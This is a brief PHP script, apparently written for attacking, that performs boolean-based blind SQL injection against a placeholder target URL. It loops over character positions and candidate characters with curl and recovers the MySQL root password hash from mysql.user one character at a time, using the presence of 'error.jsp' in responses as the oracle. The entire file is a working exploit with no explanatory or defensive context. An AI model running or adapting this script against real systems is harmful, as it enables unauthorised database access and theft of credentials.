<?PHP set_time_limit(0); $base = "网址"; $arr1 = range('A','G'); $arr2 = range(0,9); $arr = array_merge($arr1,$arr2); $arr[] = '*'; $ch = curl_init(); for($i=34; $i<50; $i++){ foreach($arr as $key=>$value){ $query = urlencode("46 and (select substr((select password from mysql.user limit 1),".$i.",1))='".$value."'"); $url = $base.$query; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $back = curl_exec($ch); /*$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); if($code == 200){ echo $value; break; } */ if(!strpos($back,'error.jsp')){ echo $value; break; } } } ?>